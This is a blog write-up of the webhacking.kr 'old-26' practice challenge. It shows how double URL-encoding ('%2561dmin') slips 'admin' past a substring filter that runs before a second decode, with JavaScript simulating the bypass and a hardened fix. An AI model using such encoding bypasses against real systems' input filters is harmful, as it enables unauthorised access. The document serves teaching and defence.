Webhacking.kr :: old-26
SECURITY/Webhacking 2021. 1. 25. 11:34

There is no input field on the page, but the script reads id from the GET query string, so the input can be supplied directly in the URL bar.

Let's just try id=admin.

As expected, the page prints no!.

The reason: if the id contains admin, the script just prints no! and stops.

But after that check it runs urldecode() on the id, and if the result is admin, the challenge is solved!

So let's submit admin in URL-encoded form.

The percent-encoded form of a is %61, so encoding just that one letter gives %61dmin, which no longer contains the substring admin.

Submitting this..

Still no!. Because the value travels inside a URL, the web server already percent-decodes it once while parsing the query string, so by the time the admin check runs the id is plain admin again.

So the payload has to be URL-encoded twice.

That is, we need to submit the URL-encoded form of %61: the % itself becomes %25.

The value is therefore %2561 (so the id is %2561dmin). The server's first decode turns it back into %61dmin, which passes the admin check, and the script's own urldecode() then produces admin.

(JS provides encodeURIComponent() and decodeURIComponent(), so the encoding and decoding can be done easily in the Chrome console; note that encodeURIComponent("admin") returns admin unchanged, because letters are never encoded, so the %61 step has to be written by hand.)

Put that in the URL bar.

Solved!
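The three attempts above, as an added example that is not the write-up's or the challenge's own code. The order of operations (reject an id containing admin, then urldecode it, then compare with admin) is taken from the description above; the server's single percent-decode of the query string is modelled with URLSearchParams, and all function names are my own. A hardened variant that decodes before validating is included for contrast.

```javascript
// Stage 1: what the web server hands the application. URLSearchParams performs the
// same single percent-decode that a server does when it parses the query string
// (PHP populating $_GET, for example).
function serverDecode(queryString) {
  return new URLSearchParams(queryString).get("id") ?? "";
}

// Stage 2: the application logic as the write-up describes it:
// filter on the once-decoded value, then decode again, then compare.
// decodeURIComponent throws URIError on malformed sequences such as "%zz";
// PHP's urldecode() would instead pass them through unchanged.
function checkId(queryString) {
  const id = serverDecode(queryString);
  if (id.includes("admin")) return "no!";      // the filter sees "admin" in attempts 1 and 2
  const decodedAgain = decodeURIComponent(id); // the script's own urldecode()
  return decodedAgain === "admin" ? "solve" : "fail";
}

// Percent-encode a single character by hand. encodeURIComponent leaves letters
// untouched, so "%61" has to be built this way.
function encodeChar(ch) {
  return "%" + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0");
}

// Build the bypass: encode one letter so the substring check fails, then encode
// the whole thing again so the server's first decode only strips one layer.
function doubleEncodedAdmin() {
  const onceEncoded = encodeChar("a") + "dmin"; // "%61dmin"
  return encodeURIComponent(onceEncoded);       // "%2561dmin"
}

// The three attempts from the write-up, in order.
function attempts() {
  return {
    plain:  checkId("id=admin"),                   // filter hits: "no!"
    single: checkId("id=%61dmin"),                 // server decode yields "admin" first: "no!"
    double: checkId("id=" + doubleEncodedAdmin()), // "%2561dmin" -> "%61dmin" -> "admin": "solve"
  };
}

// Hardened variant (added, not part of the challenge): canonicalise first, then
// validate, so no extra encoding layer can carry the forbidden string past the check.
function checkIdFixed(queryString) {
  const id = decodeURIComponent(serverDecode(queryString));
  return id.includes("admin") ? "no!" : "fail";
}

console.log(doubleEncodedAdmin(), attempts());
```

The general lesson is the one this challenge is built on: every decode step that runs after a validation step is a chance for an attacker to smuggle the forbidden value through, so normalise input fully before checking it, or check it again after each decode.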
